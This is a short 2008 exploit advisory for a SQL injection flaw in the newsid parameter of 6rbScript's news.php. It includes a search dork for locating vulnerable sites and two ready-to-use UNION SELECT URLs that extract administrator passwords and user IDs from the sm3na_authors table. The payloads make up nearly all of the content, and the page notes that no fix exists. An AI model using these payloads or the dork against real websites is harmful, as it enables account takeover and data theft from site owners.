6rbScript (news.php newsid) Remote SQL Injection Vulnerability

2008-05-21 00:00:00

##########################################################
#
# 6rbScript SQL Injection Vulnerability
#
# by Hussin X
#
# Home: www.tryag.cc/cc
#
# darkangel_g85[at]Yahoo[DoT]com
#
# DoRK: Powered by 6rbScript
##########################################################


##########################################################

Exploit:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--




###########################################################

Greetz: All IRAQI And all HACKER

###########################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.